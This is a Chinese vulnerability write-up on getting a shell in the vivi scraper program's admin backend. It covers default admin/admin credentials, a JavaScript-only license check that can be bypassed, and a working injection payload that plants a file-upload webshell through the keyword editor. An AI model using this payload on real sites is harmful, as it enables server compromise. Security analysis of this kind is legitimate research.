网站地图    收藏   

主页 > 后端 > 网站安全 >

vivi小偷程序后台管理系统后台拿shell与突破授权

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 简单介绍一下这套程序,这套程序是一个小偷程序,也就是说没有数据库没有所谓的sql注入了。然后管理员账号密码全部明文存放在/admin/data.php 里面。默认后台路径:/admin/index.php默认账...

简单介绍一下这套程序,这套程序是一个小偷程序,也就是说没有数据库没有所谓的sql注入了。
然后管理员账号密码全部明文存放在/admin/data.php 里面。
默认后台路径:/admin/index.php
默认账号密码:admin
简短点直接看怎么拿shell的代码分析。
系统配置文件就不看了,虽然用了【“】而不是单引号,经测试发现【”】也是转义的,因此让群里一基友郁闷坏了。
基本上所有只要写入文件的页面都用到了这段代码。
 


if(preg_match("/require|include|REQUEST|eval|system|fputs/i", $con)){
echo"<script>alert('含有非法字符!');location.href='?id=wyc';</script>";
过滤了一些常用的函数因此写一般的一句话路子就断了,我也不继续研究绕过了,绕过的方法很多。
下面看拿shell的地方SEO优化设置 伪原创词汇
默认点击是会提示授权信息的 www.2cto.com
 
不过简单看了一下也就是个js在搞鬼,这个简单。
用Opera浏览器就直接过去了绕过这个窗口了。
这个编辑文件是/admin/wyc.php,看代码
 
它居然用了这个stripslashes 太神奇了。。。哈哈搞笑的要死
它保存到/include/keyword.php 这个文件。先去看一下这个文件的结构好来构造语句
 
好吧他是以数组形式保存的
对比一下网页页面就可以发现,他是只保存array( ) 这中间的内容。
那知道了。 那我们就插在最前面,那就应该要先闭合这个)让这个数组结束然后再加上
我们的代码
一句话就不弄了,直接构造个小马来吧
)?><form  method="post" action="?hack=niu" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><?php if ($_GET['hack'] == 'niu') {if(!file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]);}}?>
直接看效果吧。
 
好了,就结束吧。

修复:请查看以上分析
 来自:Nuclear'Atk 网络安全研究中心

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论